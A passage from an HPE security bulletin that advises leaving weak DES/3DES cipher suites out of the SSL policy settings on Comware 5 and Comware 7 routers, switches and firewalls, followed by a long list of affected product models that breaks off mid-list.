HPSN-2008-002 here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499 RESOLUTION HPE has released the following mitigation information to resolve the vulnerability in HPE Comware 5 and Comware 7 network products. *Note:* Please contact HPE Technical Support for assistance configuring the recommended settings. **Mitigation for the DES/3DES vulnerabilities:** HPE recommends using the assl server-policya and/or the assl client-policya command to specify which ciphers to negotiate. + For Comware V7, do not include the following DES/3DES ciphers: - exp_rsa_des_cbc_sha - rsa_3des_ede_cbc_sha - rsa_des_cbc_sha + For Comware V5, do not include the following DES/3DES ciphers: - rsa_3des_ede_cbc_sha - rsa_des_cbc_sha using the assl server-policya and/or the assl client-policya command. Refer to the *Security Command Reference* manual and *Release notes* for the specific version running on the device for details. **COMWARE 5 Products** + **A6600 (Comware 5) - Version: See Mitigation** * HP Network Products - JC165A HP 6600 RPE-X1 Router Module - JC177A HP 6608 Router - JC177B HP 6608 Router Chassis - JC178A HP 6604 Router Chassis - JC178B HP 6604 Router Chassis - JC496A HP 6616 Router Chassis - JC566A HP 6600 RSE-X1 Router Main Processing Unit - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit + **HSR6602 (Comware 5) - Version: See Mitigation** * HP Network Products - JC176A HP 6602 Router Chassis - JG353A HP HSR6602-G Router - JG354A HP HSR6602-XG Router - JG355A HP 6600 MCP-X1 Router Main Processing Unit - JG356A HP 6600 MCP-X2 Router Main Processing Unit - JG776A HP HSR6602-G TAA-compliant Router - JG777A HP HSR6602-XG TAA-compliant Router - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit + **HSR6800 (Comware 5) - Version: See Mitigation** * HP Network Products - JG361A HP HSR6802 Router Chassis - JG361B HP HSR6802 Router Chassis - JG362A HP HSR6804 Router Chassis - JG362B HP HSR6804 Router Chassis - JG363A HP HSR6808 Router Chassis - JG363B HP HSR6808 Router Chassis - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit + **MSR20 (Comware 5) - Version: See Mitigation** * HP Network Products - JD432A HP A-MSR20-21 Router - JD662A HP MSR20-20 Router - JD663A HP A-MSR20-21 Router - JD663B HP MSR20-21 Router - JD664A HP MSR20-40 Router - JF228A HP MSR20-40 Router - JF283A HP MSR20-20 Router + **MSR20-1X (Comware 5) - Version: See Mitigation** * HP Network Products - JD431A HP MSR20-10 Router - JD667A HP MSR20-15 IW Multi-Service Router - JD668A HP MSR20-13 Multi-Service Router - JD669A HP MSR20-13 W Multi-Service Router - JD670A HP MSR20-15 A Multi-Service Router - JD671A HP MSR20-15 AW Multi-Service Router - JD672A HP MSR20-15 I Multi-Service Router - JD673A HP MSR20-11 Multi-Service Router - JD674A HP MSR20-12 Multi-Service Router - JD675A HP MSR20-12 W Multi-Service Router - JD676A HP MSR20-12 T1 Multi-Service Router - JF236A HP MSR20-15-I Router - JF237A HP MSR20-15-A Router - JF238A HP MSR20-15-I-W Router - JF239A HP MSR20-11 Router - JF240A HP MSR20-13 Router - JF241A HP MSR20-12 Router - JF806A HP MSR20-12-T Router - JF807A HP MSR20-12-W Router - JF808A HP MSR20-13-W Router - JF809A HP MSR20-15-A-W Router - JF817A HP MSR20-15 Router - JG209A HP MSR20-12-T-W Router (NA) - JG210A HP MSR20-13-W Router (NA) + **MSR 30 (Comware 5) - Version: See Mitigation** * HP Network Products - JD654A HP MSR30-60 POE Multi-Service Router - JD657A HP MSR30-40 Multi-Service Router - JD658A HP MSR30-60 Multi-Service Router - JD660A HP MSR30-20 POE Multi-Service Router - JD661A HP MSR30-40 POE Multi-Service Router - JD666A HP MSR30-20 Multi-Service Router - JF229A HP MSR30-40 Router - JF230A HP MSR30-60 Router - JF232A HP RTMSR3040-AC-OVSAS-H3 - JF235A HP MSR30-20 DC Router - JF284A HP MSR30-20 Router - JF287A HP MSR30-40 DC Router - JF801A HP MSR30-60 DC Router - JF802A HP MSR30-20 PoE Router - JF803A HP MSR30-40 PoE Router - JF804A HP MSR30-60 PoE Router - JG728A HP MSR30-20 TAA-compliant DC Router - JG729A HP MSR30-20 TAA-compliant Router + **MSR 30-16 (Comware 5) - Version: See Mitigation** * HP Network Products - JD659A HP MSR30-16 POE Multi-Service Router - JD665A HP MSR30-16 Multi-Service Router - JF233A HP MSR30-16 Router - JF234A HP MSR30-16 PoE Router + **MSR 30-1X (Comware 5) - Version: See Mitigation** * HP Network Products - JF800A HP MSR30-11 Router - JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr - JG182A HP MSR30-11E Router - JG183A HP MSR30-11F Router - JG184A HP MSR30-10 DC Router + **MSR 50 (Comware 5) - Version: See Mitigation** * HP Network Products - JD433A HP MSR50-40 Router - JD653A HP MSR50 Processor Module - JD655A HP MSR50-40 Multi-Service Router - JD656A HP MSR50-60 Multi-Service Router - JF231A HP MSR50-60 Router - JF285A HP MSR50-40 DC Router - JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply + **MSR 50-G2 (Comware 5) - Version: See Mitigation** * HP Network Products - JD429A HP MSR50 G2 Processor Module - JD429B HP MSR50 G2 Processor Module + **MSR 9XX (Comware 5) - Version: See Mitigation** * HP Network Products - JF812A HP MSR900 Router - JF813A HP MSR920 Router - JF814A HP MSR900-W Router - JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr - JG207A HP MSR900-W Router (NA) - JG208A HP MSR920-W Router (NA) + **MSR 93X (Comware 5) - Version: See Mitigation** * HP Network Products - JG511A HP MSR930 Router - JG511B HP MSR930 Router - JG512A HP MSR930 Wireless Router - JG513A HP MSR930 3G Router - JG513B HP MSR930 3G Router - JG514A HP MSR931 Router - JG514B HP MSR931 Router - JG515A HP MSR931 3G Router - JG516A HP MSR933 Router - JG517A HP MSR933 3G Router - JG518A HP MSR935 Router - JG518B HP MSR935 Router - JG519A HP MSR935 Wireless Router - JG520A HP MSR935 3G Router - JG531A HP MSR931 Dual 3G Router - JG531B HP MSR931 Dual 3G Router - JG596A HP MSR930 4G LTE/3G CDMA Router - JG597A HP MSR936 Wireless Router - JG665A HP MSR930 4G LTE/3G WCDMA Global Router - JG704A HP MSR930 4G LTE/3G WCDMA ATT Router - JH009A HP MSR931 Serial (TI) Router - JH010A HP MSR933 G.SHDSL (TI) Router - JH011A HP MSR935 ADSL2+ (TI) Router - JH012A HP MSR930 Wireless 802.11n (NA) Router - JH012B HP MSR930 Wireless 802.11n (NA) Router - JH013A HP MSR935 Wireless 802.11n (NA) Router + **MSR1000 (Comware 5) - Version: See Mitigation** * HP Network Products - JG732A HP MSR1003-8 AC Router + **12500 (Comware 5) - Version: See Mitigation** * HP Network Products - JC072B HP 12500 Main Processing Unit - JC085A HP A12518 Switch Chassis - JC086A HP A12508 Switch Chassis - JC652A HP 12508 DC Switch Chassis - JC653A HP 12518 DC Switch Chassis - JC654A HP 12504 AC Switch Chassis - JC655A HP 12504 DC Switch Chassis - JC808A HP 12500 TAA Main Processing Unit - JF430A HP A12518 Switch Chassis - JF430B HP 12518 Switch Chassis - JF430C HP 12518 AC Switch Chassis - JF431A HP A12508 Switch Chassis - JF431B HP 12508 Switch Chassis - JF431C HP 12508 AC Switch Chassis + **9500E (Comware 5) - Version: See Mitigation** * HP Network Products - JC124A HP A9508 Switch Chassis - JC124B HP 9505 Switch Chassis - JC125A HP A9512 Switch Chassis - JC125B HP 9512 Switch Chassis - JC474A HP A9508-V Switch Chassis - JC474B HP 9508-V Switch Chassis + **10500 (Comware 5) - Version: See Mitigation** * HP Network Products - JC611A HP 10508-V Switch Chassis - JC612A HP 10508 Switch Chassis - JC613A HP 10504 Switch Chassis - JC614A HP 10500 Main Processing Unit - JC748A HP 10512 Switch Chassis - JG375A HP 10500 TAA-compliant Main Processing Unit - JG820A HP 10504 TAA-compliant Switch Chassis - JG821A HP 10508 TAA-compliant Switch Chassis - JG822A HP 10508-V TAA-compliant Switch Chassis - JG823A HP 10512 TAA-compliant Switch Chassis + **7500 (Comware 5) - Version: See Mitigation** * HP Network Products - JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo - JC697A HP 7502 TAA-compliant Main Processing Unit - JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports - JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports - JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit - JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit - JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports - JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports - JD194A HP 7500 384Gbps Fabric Module - JD194B HP 7500 384Gbps Fabric Module - JD195A HP 7500 384Gbps Advanced Fabric Module - JD196A HP 7502 Fabric Module - JD220A HP 7500 768Gbps Fabric Module - JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports - JD238A HP 7510 Switch Chassis - JD238B HP 7510 Switch Chassis - JD239A HP 7506 Switch Chassis - JD239B HP 7506 Switch Chassis - JD240A HP 7503 Switch Chassis - JD240B HP 7503 Switch Chassis - JD241A HP 7506-V Switch Chassis - JD241B HP 7506-V Switch Chassis - JD242A HP 7502 Switch Chassis - JD242B HP 7502 Switch Chassis - JD243A HP 7503-S Switch Chassis with 1 Fabric Slot - JD243B HP 7503-S Switch Chassis with 1 Fabric Slot - JE164A HP E7902 Switch Chassis - JE165A HP E7903 Switch Chassis - JE166A HP E7903 1 Fabric Slot Switch Chassis - JE167A HP E7906 Switch Chassis - JE168A HP E7906 Vertical Switch Chassis - JE169A HP E7910 Switch Chassis + **6125G/XG Blade Switch - Version: See Mitigation** * HP Network Products - 737220-B21 HP 6125G Blade Switch with TAA - 737226-B21 HP 6125G/XG Blade Switch with TAA - 658250-B21 HP 6125G/XG Blade Switch Opt Kit - 658247-B21 HP 6125G Blade Switch Opt Kit + **5830 (Comware 5) - Version: See Mitigation** * HP Network Products - JC691A HP 5830AF-48G Switch with 1 Interface Slot - JC694A HP 5830AF-96G Switch - JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot - JG374A HP 5830AF-96G TAA-compliant Switch + **5800 (Comware 5) - Version: See Mitigation** * HP Network Products - JC099A HP 5800-24G-PoE Switch - JC099B HP 5800-24G-PoE+ Switch - JC100A HP 5800-24G Switch - JC100B HP 5800-24G Switch - JC101A HP 5800-48G Switch with 2 Slots - JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots - JC103A HP 5800-24G-SFP Switch - JC103B HP 5800-24G-SFP Switch with 1 Interface Slot - JC104A HP 5800-48G-PoE Switch - JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot - JC105A HP 5800-48G Switch - JC105B HP 5800-48G Switch with 1 Interface Slot - JG254A HP 5800-24G-PoE+ TAA-compliant Switch - JG254B HP 5800-24G-PoE+ TAA-compliant Switch - JG255A HP 5800-24G TAA-compliant Switch - JG255B HP 5800-24G TAA-compliant Switch - JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot - JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot - JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot - JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot - JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot - JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot - JG225A HP 5800AF-48G Switch - JG225B HP 5800AF-48G Switch - JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots - JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface - JG243A HP 5820-24XG-SFP+ TAA-compliant Switch - JG243B HP 5820-24XG-SFP+ TAA-compliant Switch - JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot - JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot - JC106A HP 5820-14XG-SFP+ Switch with 2 Slots - JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot - JG219A HP 5820AF-24XG Switch - JG219B HP 5820AF-24XG Switch - JC102A HP 5820-24XG-SFP+ Switch - JC102B HP 5820-24XG-SFP+ Switch + **5500 HI (Comware 5) - Version: See Mitigation** * HP Network Products - JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots - JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots - JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots - JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots - JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots - JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots - JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots - JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots + **5500 EI (Comware 5) - Version: See Mitigation** * HP Network Products - JD373A HP 5500-24G DC EI Switch - JD374A HP 5500-24G-SFP EI Switch - JD375A HP 5500-48G EI Switch - JD376A HP 5500-48G-PoE EI Switch - JD377A HP 5500-24G EI Switch - JD378A HP 5500-24G-PoE EI Switch - JD379A HP 5500-24G-SFP DC EI Switch - JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots - JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots - JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface - JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots - JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots - JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots - JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots + **4800G (Comware 5) - Version: See Mitigation** * HP Network Products - JD007A HP 4800-24G Switch - JD008A HP 4800-24G-PoE Switch - JD009A HP 4800-24G-SFP Switch - JD010A HP 4800-48G Switch - JD011A HP 4800-48G-PoE Switch + **5500SI (Comware 5) - Version: See Mitigation** * HP Network Products - JD369A HP 5500-24G SI Switch - JD370A HP 5500-48G SI Switch - JD371A HP 5500-24G-PoE SI Switch - JD372A HP 5500-48G-PoE SI Switch - JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots - JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots + **4500G (Comware 5) - Version: See Mitigation** * HP Network Products - JF428A HP 4510-48G Switch - JF847A HP 4510-24G Switch + **5120 EI (Comware 5) - Version: See Mitigation** * HP Network Products - JE066A HP 5120-24G EI Switch - JE067A HP 5120-48G EI Switch - JE068A HP 5120-24G EI Switch with 2 Interface Slots - JE069A HP 5120-48G EI Switch with 2 Interface Slots - JE070A HP 5120-24G-PoE EI 2-slot Switch - JE071A HP 5120-48G-PoE EI 2-slot Switch - JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots - JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots - JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots - JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots - JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots - JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots + **4210G (Comware 5) - Version: See Mitigation** * HP Network Products - JF844A HP 4210-24G Switch - JF845A HP 4210-48G Switch - JF846A HP 4210-24G-PoE Switch + **5120 SI (Comware 5) - Version: See Mitigation** * HP Network Products - JE072A HP 5120-48G SI Switch - JE072B HPE 5120 48G SI Switch - JE073A HP 5120-16G SI Switch - JE073B HPE 5120 16G SI Switch - JE074A HP 5120-24G SI Switch - JE074B HPE 5120 24G SI Switch - JG091A HP 5120-24G-PoE+ (370W) SI Switch - JG091B HPE 5120 24G PoE+ (370W) SI Switch - JG092A HP 5120-24G-PoE+ (170W) SI Switch - JG309B HPE 5120 8G PoE+ (180W) SI Switch - JG310B HPE 5120 8G PoE+ (65W) SI Switch + **3610 (Comware 5) - Version: See Mitigation** * HP Network Products - JD335A HP 3610-48 Switch - JD336A HP 3610-24-4G-SFP Switch - JD337A HP 3610-24-2G-2G-SFP Switch - JD338A HP 3610-24-SFP Switch + **3600V2 (Comware 5) - Version: See Mitigation** * HP Network Products - JG299A HP 3600-24 v2 EI Switch - JG299B HP 3600-24 v2 EI Switch - JG300A HP 3600-48 v2 EI Switch - JG300B HP 3600-48 v2 EI Switch - JG301A HP 3600-24-PoE+ v2 EI Switch - JG301B HP 3600-24-PoE+ v2 EI Switch - JG301C HP 3600-24-PoE+ v2 EI Switch - JG302A HP 3600-48-PoE+ v2 EI Switch - JG302B HP 3600-48-PoE+ v2 EI Switch - JG302C HP 3600-48-PoE+ v2 EI Switch - JG303A HP 3600-24-SFP v2 EI Switch - JG303B HP 3600-24-SFP v2 EI Switch - JG304A HP 3600-24 v2 SI Switch - JG304B HP 3600-24 v2 SI Switch - JG305A HP 3600-48 v2 SI Switch - JG305B HP 3600-48 v2 SI Switch - JG306A HP 3600-24-PoE+ v2 SI Switch - JG306B HP 3600-24-PoE+ v2 SI Switch - JG306C HP 3600-24-PoE+ v2 SI Switch - JG307A HP 3600-48-PoE+ v2 SI Switch - JG307B HP 3600-48-PoE+ v2 SI Switch - JG307C HP 3600-48-PoE+ v2 SI Switch + **3100V2-48 (Comware 5) - Version: See Mitigation** * HP Network Products - JG315A HP 3100-48 v2 Switch - JG315B HP 3100-48 v2 Switch + **HP870 (Comware 5) - Version: See Mitigation** * HP Network Products - JG723A HP 870 Unified Wired-WLAN Appliance - JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance + **HP850 (Comware 5) - Version: See Mitigation** * HP Network Products - JG722A HP 850 Unified Wired-WLAN Appliance - JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance + **HP830 (Comware 5) - Version: See Mitigation** * HP Network Products - JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch - JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch - JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch - JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant + **HP6000 (Comware 5) - Version: See Mitigation** * HP Network Products - JG639A HP 10500/7500 20G Unified Wired-WLAN Module - JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module + **WX5004-EI (Comware 5) - Version: See Mitigation** * HP Network Products - JD447B HP WX5002 Access Controller - JD448A HP WX5004 Access Controller - JD448B HP WX5004 Access Controller - JD469A HP WX5004 Access Controller + **SecBlade FW (Comware 5) - Version: See Mitigation** * HP Network Products - JC635A HP 12500 VPN Firewall Module - JD245A HP 9500 VPN Firewall Module - JD249A HP 10500/7500 Advanced VPN Firewall Module - JD250A HP 6600 Firewall Processing Router Module - JD251A HP 8800 Firewall Processing Module - JD255A HP 5820 VPN Firewall Module + **F1000-E (Comware 5) - Version: See Mitigation** * HP Network Products - JD272A HP F1000-E VPN Firewall Appliance + **F1000-A-EI (Comware 5) - Version: See Mitigation** * HP Network Products - JG214A HP F1000-A-EI VPN Firewall Appliance + **F1000-S-EI (Comware 5) - Version: See Mitigation** * HP Network Products - JG213A HP F1000-S-EI VPN Firewall Appliance + **F5000-A (Comware 5) - Version: See Mitigation** * HP Network Products - JD259A HP A5000-A5 VPN Firewall Chassis - JG215A HP F5000 Firewall Main Processing Unit - JG216A HP F5000 Firewall Standalone Chassis + **U200S and CS (Comware 5) - Version: See Mitigation** * HP Network Products - JD273A HP U200-S UTM Appliance + **U200A and M (Comware 5) - Version: See Mitigation** * HP Network Products - JD275A HP U200-A UTM Appliance + **F5000-C/S (Comware 5) - Version: See Mitigation** * HP Network Products - JG650A HP F5000-C VPN Firewall Appliance - JG370A HP F5000-S VPN Firewall Appliance + **SecBlade III (Comware 5) - Version: See Mitigation** * HP Network Products - JG371A HP 12500 20Gbps VPN Firewall Module - JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module + **6600 RSE RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JC177A HP 6608 Router - JC177B HP 6608 Router Chassis - JC178A HP 6604 Router Chassis - JC178B HP 6604 Router Chassis - JC496A HP 6616 Router Chassis - JC566A HP 6600 RSE-X1 Router Main Processing Unit - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit + **6600 RPE RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JC165A) HP 6600 RPE-X1 Router Module - JG781A) HP 6600 RPE-X1 TAA-compliant Main Processing Unit + **6602 RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JC176A) HP 6602 Router Chassis + **HSR6602 RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JC177A HP 6608 Router - JC177B HP 6608 Router Chassis - JC178A HP 6604 Router Chassis - JC178B HP 6604 Router Chassis - JC496A HP 6616 Router Chassis - JG353A HP HSR6602-G Router - JG354A HP HSR6602-XG Router - JG355A HP 6600 MCP-X1 Router Main Processing Unit - JG356A HP 6600 MCP-X2 Router Main Processing Unit - JG776A HP HSR6602-G TAA-compliant Router - JG777A HP HSR6602-XG TAA-compliant Router - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit + **HSR6800 RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JG361A HP HSR6802 Router Chassis - JG361B HP HSR6802 Router Chassis - JG362A HP HSR6804 Router Chassis - JG362B HP HSR6804 Router Chassis - JG363A HP HSR6808 Router Chassis - JG363B HP HSR6808 Router Chassis - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit + **SMB1910 (Comware 5) - Version: See Mitigation** * HP Network Products - JG540A HP 1910-48 Switch - JG539A HP 1910-24-PoE+ Switch - JG538A HP 1910-24 Switch - JG537A HP 1910-8 -PoE+ Switch - JG536A HP 1910-8 Switch + **SMB1920 (Comware 5) - Version: See Mitigation** * HP Network Products - JG928A HP 1920-48G-PoE+ (370W) Switch - JG927A HP 1920-48G Switch - JG926A HP 1920-24G-PoE+ (370W) Switch - JG925A HP 1920-24G-PoE+ (180W) Switch - JG924A HP 1920-24G Switch - JG923A HP 1920-16G Switch - JG922A HP 1920-8G-PoE+ (180W) Switch - JG921A HP 1920-8G-PoE+ (65W) Switch - JG920A HP 1920-8G Switch + **V1910 (Comware 5) - Version: See Mitigation** * HP Network Products - JE005A HP 1910-16G Switch - JE006A HP 1910-24G Switch - JE007A HP 1910-24G-PoE (365W) Switch - JE008A HP 1910-24G-PoE(170W) Switch - JE009A HP 1910-48G Switch - JG348A HP 1910-8G Switch - JG349A HP 1910-8G-PoE+ (65W) Switch - JG350A HP 1910-8G-PoE+ (180W) Switch + **SMB 1620 (Comware 5) - Version: See Mitigation** * HP Network Products - JG914A HP 1620-48G Switch - JG913A HP 1620-24G Switch - JG912A HP 1620-8G Switch **COMWARE 7 Products** + **12500 (Comware 7) - Version: See Mitigation** * HP Network Products - JC072B HP 12500 Main Processing Unit - JC085A HP A12518 Switch Chassis - JC086A HP A12508 Switch Chassis - JC652A HP 12508 DC Switch Chassis - JC653A HP 12518 DC Switch Chassis - JC654A HP 12504 AC Switch Chassis - JC655A HP 12504 DC Switch Chassis - JF430A HP A12518 Switch Chassis - JF430B HP 12518 Switch Chassis - JF430C HP 12518 AC Switch Chassis - JF431A HP A12508 Switch Chassis - JF431B HP 12508 Switch Chassis - JF431C HP 12508 AC Switch Chassis - JG497A HP 12500 MPU w/Comware V7 OS - JG782A HP FF 12508E AC Switch Chassis - JG783A HP FF 12508E DC Switch Chassis - JG784A HP FF 12518E AC Switch Chassis - JG785A HP FF 12518E DC Switch Chassis - JG802A HP FF 12500E MPU + **10500 (Comware 7) - Version: See Mitigation** * HP Network Products - JC611A HP 10508-V Switch Chassis - JC612A HP 10508 Switch Chassis - JC613A HP 10504 Switch Chassis - JC748A HP 10512 Switch Chassis - JG608A HP FlexFabric 11908-V Switch Chassis - JG609A HP FlexFabric 11900 Main Processing Unit - JG820A HP 10504 TAA Switch Chassis - JG821A HP 10508 TAA Switch Chassis - JG822A HP 10508-V TAA Switch Chassis - JG823A HP 10512 TAA Switch Chassis - JG496A HP 10500 Type A MPU w/Comware v7 OS - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit + **12900 (Comware 7) - Version: See Mitigation** * HP Network Products - JG619A HP FlexFabric 12910 Switch AC Chassis - JG621A HP FlexFabric 12910 Main Processing Unit - JG632A HP FlexFabric 12916 Switch AC Chassis - JG634A HP FlexFabric 12916 Main Processing Unit - JH104A HP FlexFabric 12900E Main Processing Unit - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit - JH263A HP FlexFabric 12904E Main Processing Unit - JH255A HP FlexFabric 12908E Switch Chassis - JH262A HP FlexFabric 12904E Switch Chassis - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis - JH103A HP FlexFabric 12916E Switch Chassis + **5900 (Comware 7) - Version: See Mitigation** * HP Network Products - JC772A HP 5900AF-48XG-4QSFP+ Switch - JG296A HP 5920AF-24XG Switch - JG336A HP 5900AF-48XGT-4QSFP+ Switch - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch - JG555A HP 5920AF-24XG TAA Switch - JG838A HP FF 5900CP-48XG-4QSFP+ Switch - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant + **MSR1000 (Comware 7) - Version: See Mitigation** * HP Network Products - JG875A HP MSR1002-4 AC Router - JH060A HP MSR1003-8S AC Router + **MSR2000 (Comware 7) - Version: See Mitigation** * HP Network Products - JG411A HP MSR2003 AC Router - JG734A HP MSR2004-24 AC Router - JG735A HP MSR2004-48 Router - JG866A HP MSR2003 TAA-compliant AC Router + **MSR3000 (Comware 7) - Version: See Mitigation** * HP Network Products - JG404A HP MSR3064 Router - JG405A HP MSR3044 Router - JG406A HP MSR3024 AC Router - JG407A HP MSR3024 DC Router - JG408A HP MSR3024 PoE Router - JG409A HP MSR3012 AC Router - JG410A HP MSR3012 DC Router - JG861A HP MSR3024 TAA-compliant AC Router + **MSR4000 (Comware 7) - Version: See Mitigation** * HP Network Products - JG402A HP MSR4080 Router Chassis - JG403A HP MSR4060 Router Chassis - JG412A HP MSR4000 MPU-100 Main Processing Unit - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit + **VSR (Comware 7) - Version: See Mitigation** * HP Network Products - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software - JG811AAE HP VSR1001 Comware 7 Virtual Services Router - JG812AAE HP VSR1004 Comware 7 Virtual Services Router - JG813AAE HP VSR1008 Comware 7 Virtual Services Router + **7900 (Comware 7) - Version: See Mitigation** * HP Network Products - JG682A HP FlexFabric 7904 Switch Chassis - JG841A HP FlexFabric 7910 Switch Chassis - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit + **5130 (Comware 7) - Version: See Mitigation** * HP Network Products - JG932A HP 5130-24G-4SFP+ EI Switch - JG933A HP 5130-24G-SFP-4SFP+ EI Switch - JG934A HP 5130-48G-4SFP+ EI Switch - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch - JG938A HP 5130-24G-2SFP+-2XGT EI Switch - JG939A HP 5130-48G-2SFP+-2XGT EI Switch - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch - JG975A HP 5130-24G-4SFP+ EI Brazil Switch - JG976A HP 5130-48G-4SFP+ EI Brazil Switch - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch + **6125XLG - Version: See Mitigation** * HP Network Products - 711307-B21 HP 6125XLG Blade Switch - 737230-B21 HP 6125XLG Blade Switch with TAA + **6127XLG - Version: See Mitigation** * HP Network Products - 787635-B21 HP 6127XLG Blade Switch Opt Kit - 787635-B22 HP 6127XLG Blade Switch TAA + **Moonshot - Version: See Mitigation** * HP Network Products - 786617-B21 - HP Moonshot-45Gc Switch Module - 704654-B21 - HP Moonshot-45XGc Switch Module - 786619-B21 - HP Moonshot-180XGc Switch Module + **5700 (Comware 7) - Version: See Mitigation** * HP Network Products - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch + **5930 (Comware 7) - Version: See Mitigation** * HP Network Products - JG726A HP FlexFabric 5930 32QSFP+ Switch - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch - 